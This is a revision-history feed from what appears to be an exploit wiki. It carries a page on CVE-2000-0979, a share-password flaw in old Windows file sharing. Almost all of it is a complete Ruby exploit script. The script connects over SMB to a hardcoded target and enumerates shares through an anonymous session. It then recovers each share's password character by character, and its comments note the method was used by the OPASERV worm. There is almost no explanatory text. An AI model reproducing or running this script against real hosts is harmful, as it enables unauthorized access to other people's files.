https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2000-0979%E5%AF%86%E7%A2%BC%E5%85%B1%E4%BA%AB%E6%BC%8F%E6%B4%9E
CVE-2000-0979密碼共享漏洞 - Revision history
2026-04-07T09:32:43Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2000-0979%E5%AF%86%E7%A2%BC%E5%85%B1%E4%BA%AB%E6%BC%8F%E6%B4%9E&diff=788&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # this program will exploit CVE-2000-0979. # Exploit was used by Share Password Checker # http://www.securityfriday.com/tools/SPC.html # and by WORM_OPASERV #..."
2021-03-31T06:28:09Z
<p>Created page with "==EXP== <pre> # this program will exploit CVE-2000-0979. # Exploit was used by Share Password Checker # http://www.securityfriday.com/tools/SPC.html # and by WORM_OPASERV #..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
<br />
# this program will exploit CVE-2000-0979.<br />
# Exploit was used by Share Password Checker<br />
# http://www.securityfriday.com/tools/SPC.html<br />
# and by WORM_OPASERV<br />
<br />
<br />
#TODO convert to Metasploit<br />
<br />
require 'socket'<br />
require 'hexdump'<br />
#Method: Rex::Text.to_hex_dump<br />
#Defined in:<br />
# lib/rex/text.rb<br />
#permalink .to_hex_dump(str, width = 16, base = nil) ⇒ Object<br />
<br />
#require 'pp'<br />
<br />
delay = 0.001<br />
<br />
puts "Hello CVE-2000-0979"<br />
hex = Hexdump::Dumper.new<br />
RHOST = '192.168.1.113' #'127.0.0.1'<br />
RPORT = 139<br />
<br />
$debug = FALSE<br />
<br />
<br />
socket = TCPSocket.open(RHOST, RPORT)<br />
BUFFER_SIZE = 1000<br />
<br />
def debug_puts(message)<br />
if $debug<br />
puts message<br />
end<br />
end<br />
<br />
def debug_hex_dump(hex,message)<br />
if $debug<br />
puts hex.dump(message)<br />
end<br />
end<br />
<br />
def sock_close(socket)<br />
debug_puts "Closing the Client..................."<br />
socket.close # Close the socket<br />
end<br />
<br />
#todo redo Object oriented<br />
def update_tid(packet, tid)<br />
tid_arr = tid.unpack('C*')<br />
packet.map! { |val|<br />
if val == "tid0" then<br />
tid_arr[0]<br />
elsif val == "tid1" then<br />
tid_arr[1]<br />
else val<br />
end<br />
}<br />
return packet<br />
end<br />
<br />
def update_password(packet, nbs_length,length0, length1, byte_count0, byte_count1,password,<br />
share)<br />
<br />
new_packet = packet.map { |val|<br />
if val == "length0" then<br />
length0<br />
elsif val == "length1" then<br />
length1<br />
elsif val == "byte_count0" then<br />
byte_count0<br />
elsif val == "byte_count1" then<br />
byte_count1<br />
elsif val == "nbs_length" then<br />
nbs_length<br />
else val<br />
end<br />
<br />
}<br />
<br />
share_chars = share.chars.map {|val|<br />
val.ord<br />
}<br />
<br />
new_packet.insert(new_packet.find_index("share"),share_chars).flatten!<br />
new_packet.delete_at(new_packet.find_index("share"))<br />
<br />
new_packet.insert(new_packet.find_index("password"),password).flatten!<br />
new_packet.delete_at(new_packet.find_index("password"))<br />
<br />
return new_packet<br />
end<br />
<br />
def update_machine_name(packet,machine_name)<br />
packet.insert(packet.find_index("machine_name"),machine_name).flatten!<br />
packet.delete_at(packet.find_index("machine_name"))<br />
return packet<br />
end<br />
<br />
def send_and_receive(socket, packet)<br />
hex = Hexdump::Dumper.new<br />
<br />
debug_puts "\nFinal client data "<br />
debug_hex_dump(hex,packet.pack('C*').to_s)<br />
<br />
socket.send packet.pack('C*'),0<br />
response = socket.recvfrom(BUFFER_SIZE)<br />
<br />
debug_puts "\nServer response\n"<br />
debug_hex_dump(hex,response.first.to_s)<br />
<br />
return response<br />
end<br />
<br />
<br />
<br />
tree_disconnect_request = [0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,<br />
0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0xc8, 0xff, 0xfe,<br />
0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00 ]<br />
<br />
machine_name = 32.times.map{ 0x41 + Random.rand(6) }<br />
<br />
session_request_def = [0x81, 0x00, 0x00, 0x44, 0x20, 0x45, 0x45, 0x45,<br />
0x46, 0x45, 0x47, 0x45, 0x42, 0x46, 0x46, 0x45,<br />
0x4d, 0x46, 0x45, 0x43, 0x41, 0x43, 0x41, 0x43,<br />
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,<br />
0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, "machine_name", 0x00]<br />
<br />
session_request_def = update_machine_name(session_request_def,machine_name)<br />
<br />
neg_prot_req = [0x00, 0x00, 0x00, 0x2f, 0xff, 0x53, 0x4d, 0x42,<br />
0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc8,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x02, 0x4e, 0x54,<br />
0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,<br />
0x00]<br />
<br />
sess_setup_andx_req = [0x00, 0x00, 0x00, 0x9d, 0xff, 0x53, 0x4d, 0x42,<br />
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,<br />
0x00, 0x00, 0x04, 0x00, 0x0d, 0x75, 0x00, 0x74,<br />
0x00, 0x68, 0x0b, 0x02, 0x00, 0x00, 0x00, 0x09,<br />
0x06, 0x03, 0x80, 0x01, 0x00, 0x01, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x37,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e,<br />
0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30,<br />
0x30, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63,<br />
0x65, 0x20, 0x50, 0x61, 0x63, 0x6b, 0x20, 0x33,<br />
0x20, 0x32, 0x36, 0x30, 0x30, 0x00, 0x57, 0x69,<br />
0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30,<br />
0x30, 0x30, 0x20, 0x35, 0x2e, 0x31, 0x00, 0x00,<br />
0x04, 0xff, 0x00, 0x9d, 0x00, 0x08, 0x00, 0x01,<br />
0x00, 0x1e, 0x00, 0x00, 0x5c, 0x5c, 0x31, 0x39,<br />
0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x32,<br />
0x32, 0x2e, 0x31, 0x34, 0x31, 0x5c, 0x49, 0x50,<br />
0x43, 0x24, 0x00, 0x3f, 0x3f, 0x3f, 0x3f, 0x3f,<br />
0x00 ]<br />
<br />
netshareenum_request = [0x00, 0x00, 0x00, 0x63, 0xff, 0x53, 0x4d, 0x42,<br />
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, "tid0", "tid1", 0xff, 0xfe,<br />
0x00, 0x00, 0x14, 0x00, 0x0e, 0x13, 0x00, 0x00,<br />
0x00, 0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,<br />
0x00, 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x13,<br />
0x00, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x24, 0x00, 0x5c, 0x50, 0x49, 0x50, 0x45,<br />
0x5c, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x72,<br />
0x4c, 0x65, 0x68, 0x00, 0x42, 0x31, 0x33, 0x42,<br />
0x57, 0x7a, 0x00, 0x01, 0x00, 0x00, 0x10]<br />
<br />
sess_setup_andx_req_anon = [0x00, 0x00, 0x00, 0x60, 0xff, 0x53, 0x4d, 0x42,<br />
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x20, 0x01,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x0b,<br />
0x00, 0x00, 0x01, 0x00, 0x0a, 0xff, 0x00, 0x00,<br />
0x00, 0x68, 0x0b, 0x02, 0x00, 0x01, 0x00, 0x0a,<br />
0x06, 0x02, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x29, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00,<br />
0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20,<br />
0x32, 0x30, 0x30, 0x30, 0x20, 0x32, 0x31, 0x39,<br />
0x35, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x64, 0x6f,<br />
0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 0x30, 0x20,<br />
0x35, 0x2e, 0x30, 0x00]<br />
<br />
tree_connect_request_path_password = [0x00, 0x00, 0x00, "nbs_length", 0xff, 0x53, 0x4d, 0x42,<br />
0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x20, 0x01,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x0b,<br />
0x00, 0x00, 0x01, 0x00, 0x04, 0xff, 0x00, 0x00,<br />
0x00, 0x00, 0x00,<br />
"length0", "length1", "byte_count0", "byte_count1","password",<br />
"share", 0x00, 0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00]<br />
<br />
tree_disconnect = [0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,<br />
0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x20, 0x01,<br />
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />
0x00, 0x00, 0x00, 0x00, "tid0", "tid1", 0xc0, 0x0b,<br />
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00]<br />
<br />
myhash = {}<br />
<br />
@client_packets = [{ "tree_disconnect_request" => tree_disconnect_request},<br />
{"close1" => "close"},<br />
{"session_request_def" => session_request_def},<br />
{"neg_prot_req" => neg_prot_req},<br />
{"sess_setup_andx_req" => sess_setup_andx_req},<br />
{"netshareenum_request" => netshareenum_request},<br />
{"close3" => "close"},<br />
{"session_request_2" => session_request_def},<br />
{"neg_prot_req_2" => neg_prot_req},<br />
{"sess_setup_andx_req_anon" => sess_setup_andx_req_anon}<br />
]<br />
<br />
i = 0<br />
tid = 0<br />
length0, length1, byte_count0, byte_count1,password, share = 0<br />
shares = Array.new<br />
<br />
@client_packets.each_with_index { |val, idx|<br />
begin<br />
if val[val.keys[0]].to_s == "close" and socket then<br />
sock_close(socket) #close<br />
debug_puts "Opening socket again"<br />
socket = TCPSocket.open(RHOST, RPORT) #open new<br />
next<br />
elsif !socket<br />
debug_puts "Opening socket again"<br />
socket = TCPSocket.open(RHOST, RPORT) #open new<br />
next<br />
end<br />
<br />
if [ 'netshareenum_request'].include? val.keys[0] then<br />
<br />
#update TID in packets<br />
packet = update_tid(val[val.keys[0]], tid)<br />
debug_puts "Packet updated"<br />
<br />
else<br />
packet = val[val.keys[0]]<br />
end<br />
<br />
debug_puts "\nclient data\n"<br />
debug_puts val.keys[0]<br />
response = send_and_receive(socket,packet)<br />
<br />
if val.keys[0] == "sess_setup_andx_req" then<br />
tid = response.first[28..29]<br />
debug_puts "New tree ID TID !!!!!"<br />
debug_hex_dump(hex,tid)<br />
end<br />
<br />
if val.keys[0] == "session_request_def" then<br />
session_response = response.first[0]<br />
if (session_response.ord != 0x82) then<br />
puts "Session response is not positive! Exiting."<br />
exit(0)<br />
end<br />
end<br />
<br />
if val.keys[0] == "neg_prot_req" then<br />
error_class = response.first[9]<br />
if (error_class.ord != 0x0) then<br />
puts "Error in negotiation! Exiting."<br />
exit(0)<br />
end<br />
end<br />
<br />
if val.keys[0] == "netshareenum_request" then<br />
num_of_shares = response.first[65..66].unpack('cc').first<br />
print "Number of shares: "<br />
puts num_of_shares<br />
puts "Share names: "<br />
num_of_shares.times do |n|<br />
offset = (n * 20) + 68<br />
share_name = response.first[offset..offset+15]<br />
shares.push(share_name)<br />
puts "\t" + share_name<br />
end<br />
<br />
end<br />
<br />
rescue IOError, SocketError, SystemCallError => e<br />
puts e.message<br />
puts e.backtrace.inspect<br />
exit(-1)<br />
end<br />
}<br />
<br />
<br />
#Start brute-forcing the password<br />
shares.each { |share|<br />
next_share = FALSE<br />
share = share.delete("\000")<br />
#puts share.length<br />
<br />
nbs_length = 0x33 + share.length<br />
length0 = 0x01<br />
length1 = 0x00<br />
byte_count0 = 0x08 + share.length<br />
byte_count1 = 0x00<br />
password = [0x20] #TODO skip lowercase letters<br />
<br />
puts "Brute-forcing password for share: " + share<br />
<br />
while true<br />
begin<br />
<br />
packet = update_password(tree_connect_request_path_password,nbs_length, length0, length1,<br />
byte_count0, byte_count1,password,share)<br />
debug_puts "Packet updated"<br />
response = send_and_receive(socket,packet)<br />
<br />
if ((response.first[9].unpack('C') +<br />
response.first[10].unpack('C') +<br />
response.first[11].unpack('C') +<br />
response.first[12].unpack('C'))[0] == 0) then<br />
<br />
debug_puts 'Auth success, trying next char'<br />
<br />
if (password[0] ==0x20 and password[1]==0x20)<br />
puts "Empty password works!\n\n"<br />
next_share=TRUE<br />
break<br />
end<br />
<br />
length0 = length0 + 1<br />
nbs_length = nbs_length + 1<br />
byte_count0 = byte_count0 + 1<br />
<br />
password.push(0x20)<br />
<br />
tid = response.first[28..29]<br />
debug_puts "New tree ID TID !"<br />
debug_hex_dump(hex,tid)<br />
<br />
<br />
packet = update_tid(tree_disconnect, tid)<br />
response = send_and_receive(socket,tree_disconnect)<br />
<br />
else<br />
password[length0-1] = password[length0-1] + 1<br />
<br />
password.each { |val|<br />
print val.chr()<br />
<br />
}<br />
print "\r"<br />
<br />
sleep(delay)<br />
<br />
if (password[length0-1] > 128) then<br />
password.each { |val|<br />
if (val < 128) then<br />
print val.chr()<br />
end<br />
}<br />
<br />
#TODO check for 0 length password<br />
if length0 > 1<br />
puts "\n"+'<- No more char to try, this should be your password, yikes :) '+"\n\n"<br />
else<br />
puts "Password not found :("+"\n\n"<br />
end<br />
<br />
next_share=TRUE<br />
end<br />
end<br />
<br />
rescue IOError, SocketError, SystemCallError => e<br />
puts e.message<br />
puts e.backtrace.inspect<br />
exit(-1)<br />
end<br />
<br />
if (next_share) #moving on to the next share<br />
break<br />
end<br />
end<br />
<br />
}<br />
<br />
sock_close(socket)<br />
<br />
</pre></div>
Pwnwiki